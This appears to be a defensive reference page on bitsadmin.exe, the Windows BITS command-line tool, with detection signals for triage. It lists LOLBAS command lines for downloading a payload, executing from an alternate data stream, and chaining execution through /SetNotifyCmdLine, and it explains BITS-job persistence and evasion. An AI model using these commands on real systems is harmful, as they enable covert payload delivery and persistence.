Process

unknown

bitsadmin.exe

bitsadmin.exe is a command-line tool for creating and managing BITS (Background Intelligent Transfer Service) jobs, which download or upload files in the background through a Windows service. Windows Update and many installers rely on BITS to fetch data resiliently. Microsoft has deprecated bitsadmin in favor of PowerShell, but attackers still use it to download payloads and to run a command when a transfer finishes.

CategoryUtilityTagsmicrosoftcore-windowslolbin

File identity

File details

Not observed.

Signing information

Not observed.

File version0

Not observed.

File size0

Not observed.

Execution context

File paths0

Not observed.

User context0

Not observed.

Integrity level0

Not observed.

Instances0

Not observed.

Session0

Not observed.

Token privileges0

Not observed.

Ancestry

Parents0

Not observed.

Children0

Not observed.

Grandparents0

Not observed.

Grandchildren0

Not observed.

Behavior

Loaded modules0

Not observed.

Named pipes0

Not observed.

Process handles0

Not observed.

Command-line patterns0

Not observed.

LOLBAS4
  • bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1ADS · Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
  • bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1Download · Download file from Internet
  • bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /resetCopy · Copy file
  • bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /ResetExecute · Execute binary file specified. Can be used as a defensive evasion.

View LOLBAS entry

Indicators

Hashes

Not observed.

Analysis

About this process

bitsadmin.exe drives the Background Intelligent Transfer Service, the Windows component that moves files in the background using spare bandwidth and survives reboots and dropped connections. BITS is the machinery behind much of Windows Update and software delivery. The genuine binary lives at C:\Windows\System32\bitsadmin.exe. Microsoft deprecated it in favour of the PowerShell BITS cmdlets (Start-BitsTransfer), so newer scripts increasingly use those instead.

A job is built up in steps: /create makes it, /addfile attaches a source URL and a local destination, and /resume starts the transfer. Two details matter for triage. The transfer itself is carried out by the BITS service inside svchost.exe, not by bitsadmin, so the network connection comes from the service rather than the tool. And /SetNotifyCmdLine attaches a command that BITS runs when the job completes.

Legitimately, bitsadmin is uncommon on a normal desktop, because the BITS service does its work without anyone invoking the command-line tool. Its parent and the job it builds on the command line are what give an instance meaning.

Security notes

bitsadmin.exe is a stealthy download tool (T1105, T1197). A line like bitsadmin /transfer job https://host/payload C:\Users\Public\p.exe pulls a file through the BITS service, which blends with normal update traffic and resumes across reboots. Crucially, the connection is made by svchost.exe hosting BITS, not by bitsadmin, so a network-centric view misses the origin entirely.

Its real signature technique is BITS Jobs (T1197). /SetNotifyCmdLine tells BITS to run a program when a job finishes, which lets an attacker chain a download to execution, or stand up a long-lived or recurring job as persistence that re-runs their command. The job lives in the BITS database rather than an obvious autostart location, so it survives reboots and evades the usual persistence checks.

In every case the binary is the genuine signed bitsadmin, the work hides behind a legitimate background service, and the activity resembles an ordinary update. The command-line verbs (/transfer, /addfile, /SetNotifyCmdLine) and the parent are where the intent shows.

Anomaly signals6
  • Image path other than C:\Windows\System32\bitsadmin.exehigh
  • /transfer or /addfile with an http/https URLhigh
  • /SetNotifyCmdLine attaching a command to a jobhigh
  • Parent is an Office application, cmd.exe, powershell.exe, wscript.exe, cscript.exe, or mshta.exehigh
  • A job downloading to a user-writable path (Temp, AppData, Downloads)high
  • Long-lived, suspended, or oddly named BITS jobs left on the systemmed

Telemetry

OS prevalence0

Not observed.

Observation timeline

Not observed.

References

Subsearch

Hasbeen seen inof bitsadmin.exe?
Edit this page on GitHub